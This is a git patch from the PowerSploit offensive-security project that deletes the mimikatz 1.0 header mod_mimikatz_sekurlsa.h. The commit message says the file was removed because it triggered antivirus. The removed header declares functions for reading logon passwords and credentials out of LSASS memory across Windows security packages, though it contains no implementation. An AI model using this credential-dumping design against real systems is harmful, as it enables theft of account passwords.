From c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 Mon Sep 17 00:00:00 2001 From: mattifestation Date: Mon, 3 Feb 2014 17:13:35 -0500 Subject: Removed mimikatz. This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit. --- .../mimikatz/modules/mod_mimikatz_sekurlsa.h | 64 ---------------------- 1 file changed, 64 deletions(-) delete mode 100644 Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h') diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h deleted file mode 100644 index aa05d58..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_sekurlsa.h +++ /dev/null @@ -1,64 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_memory.h" -#include "mod_process.h" -#include "mod_text.h" -#include "mod_system.h" -#include -#include "secpkg.h" - -#include "LSA Keys/keys_nt5.h" -#include "LSA Keys/keys_nt6.h" - -#include "Security Packages/msv1_0.h" -#include "Security Packages/tspkg.h" -#include "Security Packages/wdigest.h" -#include "Security Packages/kerberos.h" -#include "Security Packages/livessp.h" -#include "Security Packages/ssp.h" - -class mod_mimikatz_sekurlsa -{ -public: - typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in bool justSecurity); -private: - typedef struct _KIWI_MODULE_PKG_LSA { - wchar_t * moduleName; - wchar_t * simpleName; - PFN_ENUM_BY_LUID enumFunc; - mod_process::PKIWI_VERY_BASIC_MODULEENTRY * pModuleEntry; - _KIWI_MODULE_PKG_LSA(wchar_t * leModuleName, wchar_t * leSimpleName, PFN_ENUM_BY_LUID laEnumFunc, mod_process::PKIWI_VERY_BASIC_MODULEENTRY * pLeModuleEntry) : moduleName(leModuleName), simpleName(leSimpleName), enumFunc(laEnumFunc), pModuleEntry(pLeModuleEntry) {} - } KIWI_MODULE_PKG_LSA, *PKIWI_MODULE_PKG_LSA; - - static bool lsassOK; - static vector> GLOB_ALL_Providers; - static vector mesModules; - - static PVOID getPtrFromAVLByLuidRec(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind); - static bool ressembleString(PUNICODE_STRING maChaine, wstring * dstChaine = NULL, BYTE **buffer = NULL); - - static bool getLogonPasswords(vector * arguments); - static bool searchPasswords(vector * arguments); -public: - static HANDLE hLSASS; - static HMODULE hLsaSrv; - static mod_process::KIWI_VERY_BASIC_MODULEENTRY localLSASRV, *pModLSASRV; - static PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable; - - static PLIST_ENTRY getPtrFromLinkedListByLuid(PLIST_ENTRY pSecurityStruct, unsigned long LUIDoffset, PLUID luidToFind); - static PVOID getPtrFromAVLByLuid(PRTL_AVL_TABLE pTable, unsigned long LUIDoffset, PLUID luidToFind); - - static void genericCredsToStream(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, bool justSecurity, bool isDomainFirst = false, PDWORD pos = NULL); - static bool getLogonData(vector * mesArguments, vector> * mesProviders); - - static bool loadLsaSrv(); - static bool unloadLsaSrv(); - static bool searchLSASSDatas(); - - static vector getMimiKatzCommands(); -}; -- cgit v1.2.3